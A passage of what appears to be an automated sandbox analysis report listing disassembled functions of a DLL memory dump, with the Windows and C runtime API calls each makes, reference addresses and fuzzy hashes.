                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction Fuzzy Hash: 21117E7244828AFBCF529F84ED018DE3F63BB48394B448515FA2859570C732F6B1AB81
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 6FD103DC
                          • GetTopWindow.USER32(00000000), ref: 6FD103EF
                            • Part of subcall function 6FD103CF: GetWindow.USER32(00000000,00000002), ref: 6FD10436
                          • GetTopWindow.USER32(?), ref: 6FD1041F
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Item
                          • String ID:
                          • API String ID: 369458955-0
                          • Opcode ID: 85bda1af27250012ff7684a7423247aca0c60e1edc7bb1e971ac3d4554520011
                          • Instruction ID: 938fa594269874bb5e6f7c4a092b71038ae012ce598bd087eb054554dc4036c2
                          • Opcode Fuzzy Hash: 85bda1af27250012ff7684a7423247aca0c60e1edc7bb1e971ac3d4554520011
                          • Instruction Fuzzy Hash: 3B01D43200DB1AA79B52BF61AD0CE8F3A29AF453E0B04E022FD1495001DB31F53196E5
                          APIs
                          • RtlEnterCriticalSection.NTDLL(6FD334A8), ref: 6FD0C25A
                          • RtlInitializeCriticalSection.NTDLL(?), ref: 6FD0C26C
                          • RtlLeaveCriticalSection.NTDLL(6FD334A8), ref: 6FD0C279
                          • RtlEnterCriticalSection.NTDLL(?), ref: 6FD0C289
                            • Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
                            • Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                          • String ID:
                          • API String ID: 2895727460-0
                          • Opcode ID: e6a1f35805c07316981db3315fd87ed0607f44b3310dae0f149e438727c0a69d
                          • Instruction ID: 377153005a355eaeeccb88f35dada0b3c60e95765a2e79359fa659f7c889db30
                          • Opcode Fuzzy Hash: e6a1f35805c07316981db3315fd87ed0607f44b3310dae0f149e438727c0a69d
                          • Instruction Fuzzy Hash: BDF0F673904215AFEB807FA8CD86B09BB69EBD3335F150016E30887281CF34B490CAB1
                          APIs
                          • RtlEnterCriticalSection.NTDLL(6FD332EC), ref: 6FD0BA69
                          • TlsGetValue.KERNEL32(6FD332D0,?,?,?,?,6FD0C0B7,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BA7D
                          • RtlLeaveCriticalSection.NTDLL(6FD332EC), ref: 6FD0BA93
                          • RtlLeaveCriticalSection.NTDLL(6FD332EC), ref: 6FD0BA9E
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$EnterValue
                          • String ID:
                          • API String ID: 3969253408-0
                          • Opcode ID: afcc5008dccb942258a5366787d854ce529f4e91b1b5e03b42806bd2e6d14436
                          • Instruction ID: cd444c2566119d1bf1c68d57673a0628986ea6a9796bc5a6f3bc2ab6050cf563
                          • Opcode Fuzzy Hash: afcc5008dccb942258a5366787d854ce529f4e91b1b5e03b42806bd2e6d14436
                          • Instruction Fuzzy Hash: B3F05E7720C6049FE761AF68C888C4A77ADEE8537031A4476E759D3181DAB0F851DBA0
                          APIs
                          • __getptd.LIBCMT ref: 6FD20586
                            • Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
                            • Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F
                          • __getptd.LIBCMT ref: 6FD2059D
                          • __amsg_exit.LIBCMT ref: 6FD205AB
                          • __lock.LIBCMT ref: 6FD205BB
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                          • String ID:
                          • API String ID: 3521780317-0
                          • Opcode ID: 558ef7e6143e41505086ce800f66653cc889b2f72eda19bdc91d074449eff880
                          • Instruction ID: d3e6df323c8cacddcab5b6d874d7cf339cbff564700c13c8bab6300e022fad01
                          • Opcode Fuzzy Hash: 558ef7e6143e41505086ce800f66653cc889b2f72eda19bdc91d074449eff880
                          • Instruction Fuzzy Hash: 17F09032948710CBEBE2EBB89419B4C33E06F047ADF40265AD650A72D0CB34B541CBF1
                          APIs
                            • Part of subcall function 6FD0A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FD0A6B6), ref: 6FD0A5AA
                            • Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FD0A5CB
                            • Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FD0A5DD
                            • Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FD0A5EF
                            • Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FD0A601
                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FD0A6D0
                          • SetLastError.KERNEL32(0000006F), ref: 6FD0A6E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                          • String ID:
                          • API String ID: 2524245154-3916222277
                          • Opcode ID: 28db790b15f9505c308c52d5aa7659d86481f1577376225f585b1ebba36239bf
                          • Instruction ID: 36ba3c63018d8c8c328dbf0f2bae61e854234e0493b10cecbaec7641771f24fc
                          • Opcode Fuzzy Hash: 28db790b15f9505c308c52d5aa7659d86481f1577376225f585b1ebba36239bf
                          • Instruction Fuzzy Hash: A2217C708407189EDBA0EF70C8587DEB7B4FF45324F50869AD069DA1C0DB746A85CF60
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FD08E78
                          • PathFindExtensionW.SHLWAPI(?), ref: 6FD08E8E
                            • Part of subcall function 6FD08BDF: __EH_prolog3_GS.LIBCMT ref: 6FD08BE9
                            • Part of subcall function 6FD08BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FD08EB7,?,?), ref: 6FD08C19
                            • Part of subcall function 6FD08BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FD08C2D
                            • Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C69
                            • Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C77
                            • Part of subcall function 6FD08BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FD08C94
                            • Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FD08CBF
                            • Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FD08CC8
                            • Part of subcall function 6FD08BDF: GetModuleFileNameW.KERNEL32(6FD00000,?,00000105), ref: 6FD08D7F
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                          • String ID: %s%s.dll
                          • API String ID: 1311856149-1649984862
                          • Opcode ID: 9f5c39d675aa948355ee786796e30a274442ac147ba1bc68a400c8feaa661ce2
                          • Instruction ID: 7154edb75a7bd3869afa74eec20d6fcbd77b4a6fcdc01e9ff16635f487e9c93d
                          • Opcode Fuzzy Hash: 9f5c39d675aa948355ee786796e30a274442ac147ba1bc68a400c8feaa661ce2
                          • Instruction Fuzzy Hash: FB01A772909618EBDB41DF68D8459EFB3F9AF49310F010466A505E7140DB71B904CB90
                          APIs
                            • Part of subcall function 6FD15017: __getptd.LIBCMT ref: 6FD1501D
                            • Part of subcall function 6FD15017: __getptd.LIBCMT ref: 6FD1502D
                          • __getptd.LIBCMT ref: 6FD1C54B
                            • Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
                            • Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F
                          • __getptd.LIBCMT ref: 6FD1C559
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: csm
                          • API String ID: 803148776-1018135373
                          • Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                          • Instruction ID: 46b1d8df89330acc09adf215468455698b4a3fbdfd22f2117f6737209fc2e9fb
                          • Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                          • Instruction Fuzzy Hash: A701287580C305DBEFA6CFA1E440BDEBBB6AF10215F90442AD4509A690DB31B684DF51